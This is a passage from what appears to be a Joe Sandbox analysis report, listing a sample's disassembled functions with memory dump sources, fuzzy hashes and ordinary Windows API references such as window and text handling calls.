                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                      • Opcode ID: 1dfc6d51c36cae85748998d7bd37209dd90745009ac6fb121853290ed515ca6f
                                                                                                                                                      • Instruction ID: 068f4535d255876a3d3ca746f9ac655e4d7f7b82816fc2d5d529372abfe33618
                                                                                                                                                      • Opcode Fuzzy Hash: 1dfc6d51c36cae85748998d7bd37209dd90745009ac6fb121853290ed515ca6f
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      Function 00A52CE0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                      • Opcode ID: 6e253070fe2349e600aa2e71a54347680dcc278bd1e2736ae9c580aed3184a47
                                                                                                                                                      • Instruction ID: 8b9477ef29f6fd538265659b8372c17e090e80d45d9e80d153c1d32c218361b1
                                                                                                                                                      • Opcode Fuzzy Hash: 6e253070fe2349e600aa2e71a54347680dcc278bd1e2736ae9c580aed3184a47
                                                                                                                                                      • Instruction Fuzzy Hash: 4BA002705017018F9744CF755E0530A3695B9455D574581595405C5165D6254455D641
                                                                                                                                                      Function 00A3ABC8 Relevance: 1.0, Instructions: 977COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                                                                                                                      • Instruction ID: 5893312c7896e5830d0cca433df7dd01157a0fe6121043b86ebf42e0e367731f
                                                                                                                                                      • Opcode Fuzzy Hash: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                                                                                                                      • Instruction Fuzzy Hash: 858207316147858FCB29CF28C5906BABBF2AF95304F18895DF9DB8B742D730A945CB21
                                                                                                                                                      Function 00A25F39 Relevance: .9, Instructions: 899COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d0985edbcc457f0ddda3a2770c218dd63492e384096512e43fe977804322315b
                                                                                                                                                      • Instruction ID: dc56de3b14604792b19287d383b1396e0925b7b71c6079997579a90c78d751a5
                                                                                                                                                      • Opcode Fuzzy Hash: d0985edbcc457f0ddda3a2770c218dd63492e384096512e43fe977804322315b
                                                                                                                                                      • Instruction Fuzzy Hash: 87823AA5D3DF895EE3039A3484021E7E3A86EF71C9F46E71FF8A431426E721A6C75601
                                                                                                                                                      Function 00A3C27F Relevance: .9, Instructions: 880COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                                                                                                                      • Instruction ID: 117fdd4b0ea5df1655578cf9571b5848ed1b6403bb1b542b2b63f9e41fd5edd0
                                                                                                                                                      • Opcode Fuzzy Hash: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                                                                                                                      • Instruction Fuzzy Hash: 6D7204716043858FCB19CF68CD906A9BBE2BF95324F18856EF89A9F346D330E945CB11
                                                                                                                                                      Function 00A35214 Relevance: .7, Instructions: 694COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                                                                                                                      • Instruction ID: d57a10073bb8adbf6dc80fa7f77868cbb64adc53f5b34fb4a37019eda37b67f0
                                                                                                                                                      • Opcode Fuzzy Hash: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                                                                                                                      • Instruction Fuzzy Hash: 4A525C72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE59697255D334EA19CB86
                                                                                                                                                      Function 00A3BC05 Relevance: .5, Instructions: 537COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9288fc6b5ee01747e6edcbc7c2316654cda351bbac2ea5f57cd7682c174ccbc0
                                                                                                                                                      • Instruction ID: 524cce61efbb54faf343ca62f5be6d0fe11207c974947f0f846ac4e635f9b53f
                                                                                                                                                      • Opcode Fuzzy Hash: 9288fc6b5ee01747e6edcbc7c2316654cda351bbac2ea5f57cd7682c174ccbc0
                                                                                                                                                      • Instruction Fuzzy Hash: 4412E2706147468FD728CF28C991BB9B7E1BF48314F108A3EF59AC7281E778A995CB11
                                                                                                                                                      Function 00A346CF Relevance: .3, Instructions: 330COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 39f44f2f701261c0e56e9da29fd7a4cbf035811c6f6841cea9b53a117bb4563e
                                                                                                                                                      • Instruction ID: b63a8bf2416c932ba8155d4db5407aaba6b1b45a85845dad284eceb4ea712e05
                                                                                                                                                      • Opcode Fuzzy Hash: 39f44f2f701261c0e56e9da29fd7a4cbf035811c6f6841cea9b53a117bb4563e
                                                                                                                                                      • Instruction Fuzzy Hash: B2E16CB55083918FC704CF69D89056BBBF0AF89300F46495EF9E8A7352C334EA56DB62
                                                                                                                                                      Function 00A3A222 Relevance: .3, Instructions: 279COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: cebb41b836b5261b13714aca967af37aaf1d56c82eb4a9e1e93f5e71d2523a5e
                                                                                                                                                      • Instruction ID: 70531bf903d9cd0b886c36925dc0a12494e94236da9ddeeb64ca19c68da89466
                                                                                                                                                      • Opcode Fuzzy Hash: cebb41b836b5261b13714aca967af37aaf1d56c82eb4a9e1e93f5e71d2523a5e
                                                                                                                                                      • Instruction Fuzzy Hash: D99132722483614FDB25DF68D985BEE77E2ABA0304F14093DF9CA8B282D77498858753
                                                                                                                                                      Function 00A4C0D6 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ac3b2c546284f15a74fac136595e915943e131b9b07f9b0cb886bf763deee0fb
                                                                                                                                                      • Instruction ID: b45480cf745a43392ed87c6106026de1c528965b2595a04e44edb843438ea53d
                                                                                                                                                      • Opcode Fuzzy Hash: ac3b2c546284f15a74fac136595e915943e131b9b07f9b0cb886bf763deee0fb
                                                                                                                                                      • Instruction Fuzzy Hash: 9761BC3C60260862EEF46BAC89917FE63A4DFC5734F10061AE84FDF293E2D1AD428355
                                                                                                                                                      Function 00A4BEA7 Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                      • Instruction ID: 9c7fcf7001384b091e486ee105bacca97e4636a394d2d99f771cd7cfc07bcb4a
                                                                                                                                                      • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                      • Instruction Fuzzy Hash: 7451A83D221745A7DF788B2D89567FE23A59BD2310F18091AE94ECB682C706ED09D731
                                                                                                                                                      Function 00A34D32 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3d796b361636e166f6be2688513547eb431ebb37a79a458fb39f5f94fd42e791
                                                                                                                                                      • Instruction ID: 27a22d6bd31e07b958d011cc9334d642819893cfd27cd1c941ce9760b4ec250d
                                                                                                                                                      • Opcode Fuzzy Hash: 3d796b361636e166f6be2688513547eb431ebb37a79a458fb39f5f94fd42e791
                                                                                                                                                      • Instruction Fuzzy Hash: D851033150C3D58FC712DF28C5405AEBFF0AEAE718F5A4999F4E55B242D230EA4ACB52
                                                                                                                                                      Function 00A35F0B Relevance: .1, Instructions: 148COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0aa3ef4a5cfd67fd32c5ff55700e876a0a94ef345f0eed41e57d2ab4dac9dfaf
                                                                                                                                                      • Instruction ID: b3d0b63d948680834179a69376c95e136b5029975ad3e089d957f3b467531eb4
                                                                                                                                                      • Opcode Fuzzy Hash: 0aa3ef4a5cfd67fd32c5ff55700e876a0a94ef345f0eed41e57d2ab4dac9dfaf
                                                                                                                                                      • Instruction Fuzzy Hash: B151DEB1A087119FC758CF29D48055AF7E1BF88314F058A2EF899E7340DB30E959CB96
                                                                                                                                                      Function 00A3A008 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                                                                                      • Instruction ID: d1620241885d02d892a86e8aa8491e60995fe5d734e9070baa553edc0c682ba1
                                                                                                                                                      • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                                                                                      • Instruction Fuzzy Hash: 0531CEB16047268FCB14DF28D95116ABBE0EBA5340F144A3DF4DAC7742C775E909CB92
                                                                                                                                                      Function 00A27CBA Relevance: .1, Instructions: 106COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                                                                                      • Instruction ID: 8086b00312692d128c202976e676945e5b957ec59c90d9a4f4e375a1de83525b
                                                                                                                                                      • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                                                                                      • Instruction Fuzzy Hash: 8B41B470505B11CFC71ADF39E5559A6B7E4FF4A700B1248AEE06A8B221EB30EA04DF59
                                                                                                                                                      Function 00A492D0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction ID: b4cde4725789e360de0af1ec9ece6a236d21b9b9a29410af6375ab01e180885c
                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction Fuzzy Hash: 9611087F24414247D6148F2ED4B45BBA3A9EAC7320B6C42BED1524F6D8D222FD759900
                                                                                                                                                      Function 00A33EAA Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 240COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _swprintf.LIBCMT ref: 00A33EEA
                                                                                                                                                        • Part of subcall function 00A2F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A2F6CD
                                                                                                                                                        • Part of subcall function 00A389ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00A6E088,?,00000007,00A333E2,?,?,00000050,5C02E116), ref: 00A38A0A
                                                                                                                                                      • _strlen.LIBCMT ref: 00A33F0B
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00A6919C,?), ref: 00A33F64
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00A33F9A
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00A33FA6
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A34051
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00A34081
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00A340B0
                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00A340B8
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00A340C3
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A340F3
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00A34165
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                      • String ID: $%s:$CAPTION$d
                                                                                                                                                      • API String ID: 2407758923-2512411981
                                                                                                                                                      • Opcode ID: e282c6b5d08b03ac0288913873937255d76a7b6c77206c15e65a163b87b2e6f0
                                                                                                                                                      • Instruction ID: 11b133644b6232564fd13e8c16e505dc5c55cad22c652078aeb76dca8d74952d
